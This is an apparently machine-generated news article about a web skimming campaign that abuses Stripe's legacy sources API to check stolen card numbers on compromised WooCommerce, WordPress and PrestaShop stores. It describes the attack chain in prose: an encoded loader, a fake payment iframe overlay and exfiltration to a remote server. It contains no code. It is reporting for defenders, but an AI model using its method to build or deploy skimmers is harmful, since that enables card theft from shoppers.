Ethical Hacking News
Threat actors are exploiting a legacy Stripe API to validate stolen payment cards, raising concerns about the security of e-commerce platforms. Find out more about the web skimmer campaign and how businesses can protect themselves against such attacks.
At least 49 merchants have been estimated to have been affected by the web skimmer campaign. The attackers are using a legacy Stripe API to validate stolen payment cards, making it harder to detect. The malicious domain-based JavaScript skimmer intercepts and hides legitimate payment form on order checkout pages. Only valid card data is sent to the attackers, making the operation more efficient. The attackers are likely leveraging vulnerabilities and misconfigurations in WooCommerce, WordPress, and PrestaShop. The skimmer payload is generated using some sort of tool, tailored to each targeted site.
The cybersecurity landscape has witnessed numerous threats in recent years, but a new campaign that leverages a legacy Stripe API to validate stolen payment cards is sending waves of concern among security experts. The campaign, which was first flagged by security firm Source Defense towards the end of February 2025, has been identified as a web skimmer operation that targets various e-commerce platforms.
According to researchers from Jscrambler, who detailed the attack in their report, the threat actors behind this campaign are employing sophisticated tactics to intercept and steal sensitive payment information. The malicious domain-based JavaScript skimmer, which is designed to intercept and hide the legitimate payment form on order checkout pages, serves a replica of the legitimate Stripe payment screen, validates it using the "api.stripe[.]com/v1/sources" API, and then transmits it to a remote server in Base64-encoded format.
This tactic ensures that only valid card data is sent to the attackers, making the operation more efficient and potentially harder to detect. The skimming script hides the legitimate Stripe iframe and overlays it with a malicious one designed to mimic its appearance, while also cloning the 'Place Order' button, hiding the real one.
Jscrambler researchers further noted that the threat actors are likely leveraging vulnerabilities and misconfigurations in WooCommerce, WordPress, and PrestaShop to implant the initial stage script. This loader script serves to decipher and launch a Base64-encoded next-stage, which, in turn, contains the URL pointing to the skimmer.
The security company observed that there is some evidence to suggest that the final skimmer payload is generated using some sort of tool owing to the fact that the script appears to be tailored to each targeted site. The researchers also discovered that the skimming code has been observed adding other payment options using cryptocurrencies like Bitcoin, Ether (Ethereum), Tether, and Litecoin.
"This sophisticated web skimming campaign highlights the evolving tactics attackers use to remain undetected," said Pedro Fortuna, David Alves, and Pedro Marrucho in their report. "And as a bonus, they effectively filter out invalid credit card data, ensuring that only valid credentials are stolen."
In total, at least 49 merchants have been estimated to have been affected by the campaign to date, with fifteen of the compromised sites having taken action to remove the malicious script injections. The activity is assessed to be ongoing since at least August 20, 2024.
The attack chains employed by the threat actors are centered around using malicious domains as the initial distribution point for the JavaScript skimmer. This loader script serves to decipher and launch a Base64-encoded next-stage, which contains the URL pointing to the skimmer. The researchers further noted that the threat actors behind this operation are likely targeting several payment service providers.
The findings of Jscrambler have highlighted the importance of regular security audits and the need for businesses to stay vigilant against evolving threats. The use of legacy APIs like Stripe's "api.stripe[.]com/v1/sources" API has become a vulnerability that can be exploited by threat actors, and it is crucial for businesses to keep their systems up-to-date and ensure that all necessary security patches are applied.
As the world of cybersecurity continues to evolve, it is essential for businesses to stay informed about emerging threats like this web skimmer campaign. By understanding the tactics employed by threat actors, businesses can take proactive measures to protect themselves against such attacks.
In conclusion, the web skimmer campaign that leverages a legacy Stripe API to validate stolen payment cards is a sophisticated threat that highlights the evolving nature of cybersecurity threats. It is essential for businesses to stay vigilant and proactive in order to prevent falling victim to this type of attack.
Related Information:
https://www.ethicalhackingnews.com/articles/The-Web-Skimmer-Campaign-A-Sophisticated-Threat-to-Payment-Card-Security-ehn.shtml
https://thehackernews.com/2025/04/legacy-stripe-api-exploited-to-validate.html
Published: Thu Apr 3 00:56:12 2025 by llama3.2 3B Q4_K_M
